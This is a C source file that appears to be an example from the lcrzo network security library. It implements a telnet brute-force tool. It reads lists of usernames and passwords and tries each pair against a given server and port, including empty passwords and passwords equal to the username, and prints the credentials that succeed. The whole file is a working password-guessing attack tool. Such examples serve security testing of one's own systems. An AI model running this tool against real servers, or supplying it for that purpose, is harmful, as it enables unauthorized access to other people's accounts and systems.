
/* include the library headers */
#include <lcrzo.h>
#include "lcrzoex.h"

/*-------------------------------------------------------------*/
/* set information about this example */
shared_lcrzoex_infos lcrzoex_000273=
{ /*reference*/     "lcrzoex", 273,
  /*version*/       1, 0,
  /*title*/         "telnet brute force",
  /*french title*/  "brute force telnet",
  /*description*/   "",
  /*french desc.*/  "",
  /*usage*/         "server_name server_port usernamesfile passwdsfile",
  /*french usage*/  "nom_serveur port_serveur fichierutilisateurs fichiermotsdepasse",
  /*usage example*/ "1.2.3.4 23 /tmp/userlist /tmp/passlist",
  /*fr. usage ex.*/ "1.2.3.4 23 /tmp/listutil /tmp/listepasswd",
  /*author*/        "Laurent"
};

/*-------------------------------------------------------------*/
/* function declarations */
int lcrzoex_000273_main(int argc, char *argv[]);
int lcrzoex_000273_telnet_brute(lcrzo_ipl ipl,
				lcrzo_uint16 port,
				lcrzo_conststring user,
				lcrzo_conststring pass);

/*-------------------------------------------------------------*/
/* main function : you can rename it to "main", and then this file
   can be compiled alone. */
int lcrzoex_000273_main(int argc, char *argv[])
{ lcrzo_ipl ipl;
  lcrzo_uint16 port;
  lcrzo_string user, pass;
  lcrzo_int32 datasize;
  lcrzo_file fileuser, filepass;

  lcrzo_init();
  if ( argc<5 )
  { /* print usage */
    lcrzo_epr(shared_lcrzoex_infos_print(lcrzoex_000273, argv[0]));
    return(LCRZOEX_ERR_MISC_BADTOOLUSAGE);
  }

  /* initialize the needed variables */
  lcrzo_epr(shared_para_ipl_init_dst(argv[1], &ipl));
  lcrzo_epr(shared_para_port_init_dst(argv[2], 23, &port));
  lcrzo_epr(lcrzo_file_open_read(argv[3], &fileuser));

  /* read each line of the files all try to access */  
  while ( lcrzo_file_readm_line(&fileuser, LCRZO_WAIT_INFINITE, 
				(lcrzo_data*)&user, &datasize)
          == LCRZO_ERR_OK )
  { user[datasize]='\0';
    /* first, try with pass=="" */
    lcrzo_epr(lcrzoex_000273_telnet_brute(ipl, port, user, ""));
    /* then, try with pass==login */
    lcrzo_epr(lcrzoex_000273_telnet_brute(ipl, port, user, user));
    /* then try each password of the file */
    lcrzo_epr(lcrzo_file_open_read(argv[4], &filepass));
    while ( lcrzo_file_readm_line(&filepass, LCRZO_WAIT_INFINITE, 
				  (lcrzo_data*)&pass, &datasize)
          == LCRZO_ERR_OK )
    { pass[datasize]='\0';
      lcrzo_epr(lcrzoex_000273_telnet_brute(ipl, port, user, pass));
      lcrzo_epr(lcrzo_string_free2(&pass));
    }
    lcrzo_epr(lcrzo_file_close(&filepass));
    lcrzo_epr(lcrzo_string_free2(&user));
  }

  /* close */
  lcrzo_epr(lcrzo_file_close(&fileuser));
  lcrzo_close();
  return(LCRZO_ERR_OK);
}

/*-------------------------------------------------------------*/
int lcrzoex_000273_telnet_brute(lcrzo_ipl ipl,
				lcrzo_uint16 port,
				lcrzo_conststring user,
				lcrzo_conststring pass)
{ static lcrzo_int32 numtest=0;
  shared_telnet telnet;
  int ret;

  /* init the session */
  lcrzo_epr(shared_telnet_init(ipl, port, &telnet));

  /* send login/password */
  ret=shared_telnet_login(&telnet, user, pass);
  if ( ret==LCRZO_ERR_OK)
  { printf("%s\t%s\t-> OK\n", user, pass);
    /* logout */
    lcrzo_epr(shared_telnet_logout(&telnet));
    /* close the session */
    lcrzo_epr(shared_telnet_close(&telnet));
  }
  else if ( ret==LCRZOEX_ERR_TELNET_BADLOGINPASS )
  { numtest++;
    if (!(numtest%10))
    { lcrzo_epr(lcrzo_int32_print("", numtest, "%d", " passwd tried"));
    }
  }
  else
    return(ret);

  return (LCRZO_ERR_OK);
}

